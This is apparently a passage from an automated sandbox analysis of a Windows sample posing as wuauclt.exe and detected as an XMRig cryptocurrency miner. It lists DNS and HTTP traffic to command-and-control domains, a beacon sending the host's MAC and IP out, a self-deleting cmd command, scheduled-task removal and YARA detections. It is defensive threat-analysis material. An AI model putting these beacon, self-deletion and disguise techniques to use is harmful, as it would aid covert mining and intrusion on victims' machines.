                                              Feb 23, 2022 03:18:35.260540009 CET192.168.2.48.8.8.80xb81bStandard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:35.923979998 CET192.168.2.48.8.8.80x38aeStandard query (0)p.boreye.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:37.243433952 CET192.168.2.48.8.8.80x3f04Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:38.890449047 CET192.168.2.48.8.8.80x9c2dStandard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:38.893395901 CET192.168.2.48.8.8.80xa768Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:38.894129992 CET192.168.2.48.8.8.80x11c2Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:41.081799030 CET192.168.2.48.8.8.80xcfb1Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:43.187747955 CET192.168.2.48.8.8.80xa9e4Standard query (0)p.boreye.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:44.117515087 CET192.168.2.48.8.8.80x6245Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:45.768086910 CET192.168.2.48.8.8.80xa56aStandard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:47.414551973 CET192.168.2.48.8.8.80x34f5Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:47.516845942 CET192.168.2.48.8.8.80xac0cStandard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:49.579732895 CET192.168.2.48.8.8.80xbbd4Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:50.236934900 CET192.168.2.48.8.8.80x31d4Standard query (0)p.boreye.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:51.621498108 CET192.168.2.48.8.8.80xad61Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:51.624475956 CET192.168.2.48.8.8.80x24ddStandard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:51.625406027 CET192.168.2.48.8.8.80x90f1Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:57.742340088 CET192.168.2.48.8.8.80x7c2eStandard query (0)p.boreye.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:58.243387938 CET192.168.2.48.8.8.80xac87Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:58.307921886 CET192.168.2.48.8.8.80xbbbaStandard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:59.776154995 CET192.168.2.48.8.8.80x6900Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:59.776232958 CET192.168.2.48.8.8.80xbd29Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:59.777285099 CET192.168.2.48.8.8.80xac4eStandard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:19:01.945007086 CET192.168.2.48.8.8.80xac68Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:19:01.946022987 CET192.168.2.48.8.8.80xba45Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:19:01.946749926 CET192.168.2.48.8.8.80xff3fStandard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:19:04.486354113 CET192.168.2.48.8.8.80xdf5bStandard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:19:04.569201946 CET192.168.2.48.8.8.80x3f3bStandard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:19:04.572580099 CET192.168.2.48.8.8.80xda1fStandard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:19:04.732263088 CET192.168.2.48.8.8.80x2528Standard query (0)p.boreye.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:19:07.665957928 CET192.168.2.48.8.8.80xc239Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:19:10.112005949 CET192.168.2.48.8.8.80xac5Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:19:10.112826109 CET192.168.2.48.8.8.80xc0Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:19:11.486414909 CET192.168.2.48.8.8.80xa293Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:19:11.488241911 CET192.168.2.48.8.8.80x220eStandard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:19:11.488588095 CET192.168.2.48.8.8.80x8800Standard query (0)r.affordblue.comA (IP address)IN (0x0001)

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              Feb 23, 2022 03:17:15.190376043 CET8.8.8.8192.168.2.40x352eNo error (0)log.boreye.com72.52.178.23A (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:21.876384974 CET8.8.8.8192.168.2.40xb3daNo error (0)bk.estonine.com5.79.71.205A (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:21.876384974 CET8.8.8.8192.168.2.40xb3daNo error (0)bk.estonine.com5.79.71.225A (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:21.876384974 CET8.8.8.8192.168.2.40xb3daNo error (0)bk.estonine.com85.17.31.82A (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:21.876384974 CET8.8.8.8192.168.2.40xb3daNo error (0)bk.estonine.com85.17.31.122A (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:21.876384974 CET8.8.8.8192.168.2.40xb3daNo error (0)bk.estonine.com178.162.203.202A (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:21.876384974 CET8.8.8.8192.168.2.40xb3daNo error (0)bk.estonine.com178.162.203.211A (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:21.876384974 CET8.8.8.8192.168.2.40xb3daNo error (0)bk.estonine.com178.162.203.226A (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:21.876384974 CET8.8.8.8192.168.2.40xb3daNo error (0)bk.estonine.com178.162.217.107A (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:28.700639963 CET8.8.8.8192.168.2.40xb451No error (0)p.boreye.com72.52.178.23A (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:39.047730923 CET8.8.8.8192.168.2.40x532dNo error (0)p.boreye.com72.52.178.23A (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:50.110178947 CET8.8.8.8192.168.2.40xe71eNo error (0)p.boreye.com72.52.178.23A (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:57.144934893 CET8.8.8.8192.168.2.40x5307No error (0)p.boreye.com72.52.178.23A (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:04.117537022 CET8.8.8.8192.168.2.40xb3daNo error (0)p.boreye.com72.52.178.23A (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:11.767764091 CET8.8.8.8192.168.2.40x1d6dNo error (0)p.boreye.com72.52.178.23A (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:20.171061993 CET8.8.8.8192.168.2.40x52e3No error (0)p.boreye.com72.52.178.23A (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:28.223310947 CET8.8.8.8192.168.2.40x3d3fNo error (0)p.boreye.com72.52.178.23A (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:35.943134069 CET8.8.8.8192.168.2.40x38aeNo error (0)p.boreye.com72.52.178.23A (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:43.236373901 CET8.8.8.8192.168.2.40xa9e4No error (0)p.boreye.com72.52.178.23A (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:50.255825996 CET8.8.8.8192.168.2.40x31d4No error (0)p.boreye.com72.52.178.23A (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:57.759541988 CET8.8.8.8192.168.2.40x7c2eNo error (0)p.boreye.com72.52.178.23A (IP address)IN (0x0001)
                                              Feb 23, 2022 03:19:04.851639986 CET8.8.8.8192.168.2.40x2528No error (0)p.boreye.com72.52.178.23A (IP address)IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • log.boreye.com

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.44976672.52.178.2380C:\Users\user\Desktop\wuauclt.exe
                                              TimestampkBytes transferredDirectionData
                                              Feb 23, 2022 03:17:18.386657953 CET1067OUTGET /ipc.html?mac=EC:F4:BB:EA:15:88&ip=192.168.2.4&host=581804&tick=71min&c=Install_Done HTTP/1.1
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)
                                              Host: log.boreye.com
                                              Cache-Control: no-cache
                                              Feb 23, 2022 03:17:18.539530993 CET1069INHTTP/1.1 200 OK
                                              Date: Wed, 23 Feb 2022 02:17:18 GMT
                                              Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9
                                              X-Powered-By: PHP/5.4.16
                                              Transfer-Encoding: chunked
                                              Content-Type: text/html; charset=UTF-8
                                              Data Raw: 37 39 63 0d 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 73 63 72 69 70 74 3e 0a 09 09 09 76 61 72 20 66 6f 72 77 61 72 64 69 6e 67 55 72 6c 20 3d 20 22 2f 70 61 67 65 2f 62 6f 75 6e 63 79 2e 70 68 70 3f 26 62 70 61 65 3d 47 62 68 4f 74 79 73 47 6f 6b 78 37 39 6f 75 6f 5a 41 79 4e 71 25 32 46 4f 67 47 79 5a 39 25 32 46 43 73 45 58 71 47 66 4d 51 6e 6a 4a 53 56 73 54 64 25 32 46 68 41 4e 61 50 49 6c 48 70 48 75 6c 32 6d 42 7a 6e 57 42 56 6c 4c 51 6d 63 68 38 4d 68 69 4d 4a 36 51 25 32 46 4f 70 33 75 39 72 52 63 62 4f 63 64 45 5a 4b 44 44 67 38 53 35 48 49 6a 7a 37 6d 52 56 58 48 44 55 68 47 36 36 6b 36 51 44 49 4d 53 70 30 64 63 77 57 67 25 32 42 61 77 6b 62 43 50 7a 68 75 76 66 39 7a 66 6c 68 58 32 6b 6f 63 6d 36 78 66 6f 66 25 32 42 55 25 32 46 7a 78 36 57 50 53 79 57 4f 34 4b 33 43 5a 69 45 7a 39 48 59 25 32 42 68 69 35 5a 75 67 73 25 32 42 77 74 41 66 4b 55 54 25 32 42 6d 31 66 57 6f 54 78 64 4f 6b 47 71 74 54 25 32 42 4b 57 7a 66 6a 72 66 4c 49 67 4b 6b 61 77 52 74 6b 49 36 75 4d 42 36 77 68 63 76 4c 7a 6d 71 36 25 32 46 50 74 48 67 5a 50 47 77 42 67 73 75 70 65 4f 78 69 70 53 51 48 63 78 34 42 34 58 4e 5a 4c 62 41 59 33 34 74 58 6b 4c 34 78 39 35 38 4b 4d 61 34 25 32 46 78 79 6a 77 55 57 58 50 58 6a 30 46 69 69 6e 73 67 6e 54 74 58 25 32 46 42 44 53 32 32 6e 4a 42 57 61 73 55 50 65 67 32 69 76 6a 62 48 45 76 6c 69 4e 68 37 69 34 57 64 6a 39 46 72 61 43 74 32 72 42 63 25 32 42 6b 48 6b 51 58 6f 41 5a 32 69 55 63 75 34 35 46 58 70 32 51 7a 54 4b 54 46 7a 4a 36 54 7a 6d 7a 79 67 25 33 44 25 33 44 26 72 65 64 69 72 65 63 74 54 79 70 65 3d 6a 73 22 3b 0a 09 09 09 76 61 72 20 64 65 73 74 69 6e 61 74 69 6f 6e 55 72 6c 20 3d 20 22 2f 70 61 67 65 2f 62 6f 75 6e 63 79 2e 70 68 70 3f 26 62 70 61 65 3d 47 62 68 4f 74 79 73 47 6f 6b 78 37 39 6f 75 6f 5a 41 79 4e 71 25 32 46 4f 67 47 79 5a 39 25 32 46 43 73 45 58 71 47 66 4d 51 6e 6a 4a 53 56 73 54 64 25 32 46 68 41 4e 61 50 49 6c 48 70 48 75 6c 32 6d 42 7a 6e 57 42 56 6c 4c 51 6d 63 68 38 4d 68 69 4d 4a 36 51 25 32 46 4f 70 33 75 39 72 52 63 62 4f 63 64 45 5a 4b 44 44 67 38 53 35 48 49 6a 7a 37 6d 52 56 58 48 44 55 68 47 36 36 6b 36 51 44 49 4d 53 70 30 64 63 77 57 67 25 32 42 61 77 6b 62 43 50 7a 68 75 76 66 39 7a 66 6c 68 58 32 6b 6f 63 6d 36 78 66 6f 66 25 32 42 55 25 32 46 7a 78 36 57 50 53 79 57 4f 34 4b 33 43 5a 69 45 7a 39 48 59 25 32 42 68 69 35 5a 75 67 73 25 32 42 77 74 41 66 4b 55 54 25 32 42 6d 31 66 57 6f 54 78 64 4f 6b 47 71 74 54 25 32 42 4b 57 7a 66 6a 72 66 4c 49 67 4b 6b 61 77 52 74 6b 49 36 75 4d 42 36 77 68 63 76 4c 7a 6d 71 36 25 32 46 50 74 48 67 5a 50 47 77 42 67 73 75 70 65 4f 78 69 70 53 51 48 63 78 34 42 34 58 4e 5a 4c 62 41 59 33 34 74 58 6b 4c 34 78 39 35 38 4b 4d 61 34 25 32 46 78 79 6a 77 55 57 58 50 58 6a 30 46 69 69 6e 73 67 6e 54 74 58 25 32 46 42 44 53 32 32 6e 4a 42 57 61 73 55 50 65 67 32 69 76 6a 62 48 45 76 6c 69 4e 68 37 69 34 57 64 6a 39 46 72 61 43 74 32 72 42 63 25 32 42 6b 48 6b 51 58 6f 41 5a 32 69 55 63 75 34 35 46 58 70 32 51 7a 54 4b 54 46 7a 4a 36 54 7a 6d 7a 79 67 25 33 44 25 33 44 26 72 65 64 69 72 65 63 74 54 79 70 65 3d 6d 65 74 61 22 3b 0a 09 09 09 76 61 72 20 61 64 64 44 65 74 65 63 74 69 6f 6e 20 3d 20 74 72 75 65 3b 0a 09 09 09 69 66 20 28 61 64 64 44 65 74 65 63 74 69 6f 6e 29 20 7b 0a 09 09 09 09 76 61 72 20 69 6e 49 66 72 61 6d 65 20 3d 20 77 69 6e 64 6f 77 2e 73 65 6c 66 20 21 3d 3d 20 77
                                              Data Ascii: 79c<html><head><script>var forwardingUrl = "/page/bouncy.php?&bpae=GbhOtysGokx79ouoZAyNq%2FOgGyZ9%2FCsEXqGfMQnjJSVsTd%2FhANaPIlHpHul2mBznWBVlLQmch8MhiMJ6Q%2FOp3u9rRcbOcdEZKDDg8S5HIjz7mRVXHDUhG66k6QDIMSp0dcwWg%2BawkbCPzhuvf9zflhX2kocm6xfof%2BU%2Fzx6WPSyWO4K3CZiEz9HY%2Bhi5Zugs%2BwtAfKUT%2Bm1fWoTxdOkGqtT%2BKWzfjrfLIgKkawRtkI6uMB6whcvLzmq6%2FPtHgZPGwBgsupeOxipSQHcx4B4XNZLbAY34tXkL4x958KMa4%2FxyjwUWXPXj0FiinsgnTtX%2FBDS22nJBWasUPeg2ivjbHEvliNh7i4Wdj9FraCt2rBc%2BkHkQXoAZ2iUcu45FXp2QzTKTFzJ6Tzmzyg%3D%3D&redirectType=js";var destinationUrl = "/page/bouncy.php?&bpae=GbhOtysGokx79ouoZAyNq%2FOgGyZ9%2FCsEXqGfMQnjJSVsTd%2FhANaPIlHpHul2mBznWBVlLQmch8MhiMJ6Q%2FOp3u9rRcbOcdEZKDDg8S5HIjz7mRVXHDUhG66k6QDIMSp0dcwWg%2BawkbCPzhuvf9zflhX2kocm6xfof%2BU%2Fzx6WPSyWO4K3CZiEz9HY%2Bhi5Zugs%2BwtAfKUT%2Bm1fWoTxdOkGqtT%2BKWzfjrfLIgKkawRtkI6uMB6whcvLzmq6%2FPtHgZPGwBgsupeOxipSQHcx4B4XNZLbAY34tXkL4x958KMa4%2FxyjwUWXPXj0FiinsgnTtX%2FBDS22nJBWasUPeg2ivjbHEvliNh7i4Wdj9FraCt2rBc%2BkHkQXoAZ2iUcu45FXp2QzTKTFzJ6Tzmzyg%3D%3D&redirectType=meta";var addDetection = true;if (addDetection) {var inIframe = window.self !== w
                                              Feb 23, 2022 03:17:18.539585114 CET1070INData Raw: 69 6e 64 6f 77 2e 74 6f 70 3b 0a 09 09 09 09 66 6f 72 77 61 72 64 69 6e 67 55 72 6c 20 2b 3d 20 22 26 69 6e 49 66 72 61 6d 65 3d 22 20 2b 20 69 6e 49 66 72 61 6d 65 3b 0a 09 09 09 09 76 61 72 20 69 6e 50 6f 70 55 70 20 3d 20 28 77 69 6e 64 6f 77
                                              Data Ascii: indow.top;forwardingUrl += "&inIframe=" + inIframe;var inPopUp = (window.opener !== undefined && window.opener !== null && window.opener !== window);forwardingUrl += "&inPopUp=" + inPopUp;}window.location.replace(forward


                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:03:17:07
                                              Start date:23/02/2022
                                              Path:C:\Users\user\Desktop\wuauclt.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\user\Desktop\wuauclt.exe"
                                              Imagebase:0x250000
                                              File size:7154917 bytes
                                              MD5 hash:A5CC0738A563489458F6541C3D3DC722
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low

                                              General

                                              Target ID:1
                                              Start time:03:17:07
                                              Start date:23/02/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff724c50000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Target ID:2
                                              Start time:03:17:09
                                              Start date:23/02/2022
                                              Path:C:\Windows\SysWOW64\svchost.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\svchost.exe -k netsvcs
                                              Imagebase:0x930000
                                              File size:44520 bytes
                                              MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000002.00000002.968926651.000000000309D000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                              • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000002.00000002.969129932.0000000003991000.00000040.00000800.00020000.00000000.sdmp, Author: Florian Roth
                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000002.00000003.707573685.0000000005900000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                              • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000002.00000003.707573685.0000000005900000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                              • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000002.00000003.707573685.0000000005900000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000002.00000003.707573685.0000000005900000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000002.00000002.968774833.0000000003012000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                              Reputation:high

                                              General

                                              Target ID:8
                                              Start time:03:17:18
                                              Start date:23/02/2022
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline: /End /TN "\Microsoft\Windows\UPnP\RpcPolicyHost"
                                              Imagebase:0x230000
                                              File size:185856 bytes
                                              MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Target ID:9
                                              Start time:03:17:18
                                              Start date:23/02/2022
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:cmd.exe /c ping 127.0.0.1 -n 5 & cmd.exe /c del /a /f "C:\Users\user\Desktop\wuauclt.exe"
                                              Imagebase:0x11d0000
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Target ID:10
                                              Start time:03:17:19
                                              Start date:23/02/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff724c50000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Target ID:11
                                              Start time:03:17:19
                                              Start date:23/02/2022
                                              Path:C:\Windows\SysWOW64\schtasks.exe
                                              Wow64 process (32bit):true
                                              Commandline: /Delete /TN "\Microsoft\Windows\UPnP\RpcPolicyHost" /F
                                              Imagebase:0x230000
                                              File size:185856 bytes
                                              MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Target ID:12
                                              Start time:03:17:19
                                              Start date:23/02/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff724c50000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Target ID:13
                                              Start time:03:17:19
                                              Start date:23/02/2022
                                              Path:C:\Windows\SysWOW64\PING.EXE
                                              Wow64 process (32bit):true
                                              Commandline:ping 127.0.0.1 -n 5
                                              Imagebase:0xe30000
                                              File size:18944 bytes
                                              MD5 hash:70C24A306F768936563ABDADB9CA9108
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Target ID:14
                                              Start time:03:17:20
                                              Start date:23/02/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff724c50000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Target ID:15
                                              Start time:03:17:21
                                              Start date:23/02/2022
                                              Path:C:\Windows\SysWOW64\ctfmon.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\system32\ctfmon.exe
                                              Imagebase:0x11c0000
                                              File size:9728 bytes
                                              MD5 hash:12764C4EC54842D1790BD8FA91033268
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              General

                                              Target ID:16
                                              Start time:03:17:25
                                              Start date:23/02/2022
                                              Path:C:\Windows\SysWOW64\dllhostex.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\system32\dllhostex.exe
                                              Imagebase:0x1290000
                                              File size:1360384 bytes
                                              MD5 hash:D0C6EDC58729D88970CB9EE8A456457C
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000010.00000000.695613920.00000000013CC000.00000008.00000001.01000000.00000005.sdmp, Author: Florian Roth
                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000010.00000000.695573100.00000000013AE000.00000002.00000001.01000000.00000005.sdmp, Author: Florian Roth
                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000000.695573100.00000000013AE000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                              • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000010.00000000.696093152.00000000013CC000.00000008.00000001.01000000.00000005.sdmp, Author: Florian Roth
                                              • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000010.00000000.696628096.00000000013CC000.00000008.00000001.01000000.00000005.sdmp, Author: Florian Roth
                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp, Author: Florian Roth
                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000002.969147981.00000000013AE000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000010.00000000.695093675.00000000013AE000.00000002.00000001.01000000.00000005.sdmp, Author: Florian Roth
                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000000.695093675.00000000013AE000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000010.00000000.696044384.00000000013AE000.00000002.00000001.01000000.00000005.sdmp, Author: Florian Roth
                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000000.696044384.00000000013AE000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                              • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000010.00000000.695147785.00000000013CC000.00000008.00000001.01000000.00000005.sdmp, Author: Florian Roth
                                              • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000010.00000002.969187607.00000000013CC000.00000004.00000001.01000000.00000005.sdmp, Author: Florian Roth
                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000010.00000000.696614695.00000000013AE000.00000002.00000001.01000000.00000005.sdmp, Author: Florian Roth
                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000010.00000000.696614695.00000000013AE000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                              • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: C:\Windows\SysWOW64\dllhostex.exe, Author: Florian Roth
                                              • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: C:\Windows\SysWOW64\dllhostex.exe, Author: Florian Roth
                                              • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Windows\SysWOW64\dllhostex.exe, Author: Florian Roth
                                              • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Windows\SysWOW64\dllhostex.exe, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 54%, Metadefender, Browse
                                              • Detection: 90%, ReversingLabs
                                              Reputation:low

                                              General

                                              Target ID:17
                                              Start time:03:17:25
                                              Start date:23/02/2022
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:cmd.exe /c del /a /f "C:\Users\user\Desktop\wuauclt.exe"
                                              Imagebase:0x11d0000
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Target ID:18
                                              Start time:03:17:26
                                              Start date:23/02/2022
                                              Path:C:\Windows\System32\svchost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                              Imagebase:0x7ff6eb840000
                                              File size:51288 bytes
                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Target ID:19
                                              Start time:03:17:26
                                              Start date:23/02/2022
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff724c50000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
